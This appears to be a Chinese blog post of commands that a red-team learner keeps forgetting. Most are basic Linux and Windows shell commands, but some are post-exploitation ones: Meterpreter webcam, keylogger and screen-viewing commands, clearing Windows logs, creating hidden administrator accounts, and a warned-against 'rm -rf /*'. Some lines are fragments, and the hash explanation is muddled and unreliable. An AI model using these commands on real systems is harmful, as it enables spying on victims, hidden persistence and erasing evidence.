最近小编发现在学红队的时候总会忘记一些命令(基础的),导致整天红温,于是今天就来偷个懒记一下(一起回顾一下)
pwd
cat filename.txt
cd ..|| cd ../ 返回上一级目录
cd /. 返回根目录
cd /home/kali 进入kali下的home 目录
ls 查看当前文件夹下的内容
ls -a 查看隐藏文件
ls -l 参看详细文件内容
rm -rf 文件名字||目录名字 递归的删除这个文件或者目录
//千万不要执行 rm -rf /* 因为这行命令的意思是
递归性地,强制性地删除根目录下的所有文件与目录
比如现在我有一个damn.txt文件,我想匹配里面的flag字段
那么我们就可以这样子写命令
grep "flag" /home/kali/damn.txt
当然了它还可以正则匹配,(有点regexp那味了)
还记得发明它的作者离世的时候,无数网友都打出来wq来去纪念他
vim /home/kali/damn.txt
然后点击i 进行编辑 编辑完成之后,就可以 先点击 esc 然后再点击 :
输入q就是不保存退出,输入wq就是保存并且退出 再加一个!就是强制的意思
以下就是基本格式
r
(读)为 4、w
(写)为 2、x
(执行)为 1 你想给多少权限, 就将对应相加
chmod + 7 damn.txt
这样就是对damn.txt赋予最高的可读,可写,可执行的权限
chmod 777 *
但是一般都是直接在一个目录下这样 这样就对所有的文件都赋予这样的操作
黑客军团中曾经出现过这一幕,我们来分析一下
首先,这是一个错误的穿帮指令
主角应该是想要用 ps aux| grep root
这个意思就是先列出所有进程,并且匹配管理员身份运行的进程
这样得到的值前面的是LM算法加密的得到的值,后面的是md5算法加密的值
用于提权,不过对于win11一般不行,要用其他的方法提权
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcamm
录音,这个不用多说
这个用来截图
这个可以用来监听键盘
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
这行命令可以用来查看靶机的实时桌面
screenshare
upload /home/kali/..... C://...... 这个是上传
download C://flag.txt /home/kali
可以直接播放一段音频(但是似乎有点问题,还不如直接写个py的脚本传上去运行)
清除windows中的应用程序日志、系统日志、安全日志
查看相关的信息
netsh firewall show stat
tasklist
taskkill /f /im +进程名
echo "你要写的内容" >filename.txt
echo "你要写的内容" >>filename.txt
第一个是覆盖,第二个是追加 如果你想换行 只需要在要换行处加上^即可
del filename
systeminfo
net user //查看本机用户
net user /domain //查看域中的用户
net user "你的用户名" "密码" /add||/del 创建或者新建一个用户
//在用户名字后面加一个$ 意思就是隐藏用户
net localgroup administrators "用户名" /add||/del 将你的用户名提权到管理员组
net user "你的用户" /active:yes
type filename
不知道你们有没有试过,在meterpreter的shell进去之后会看到这样的东西
于是我们可以运行一下命令
chcp 65001
其中chcp 是change code page的意思 65001 则是对应utf-8编码。这样就能在控制台显示正常了
netstat -an
netstat -an | find "3306" //查询3306端口是否开放
在这里解释一下 “ | ”,这个就是管道的意思,将上一个命令执行的结果传递给下一个命令去执行
以上就是一些渗透时候常用到的指令(若有缺失欢迎补充)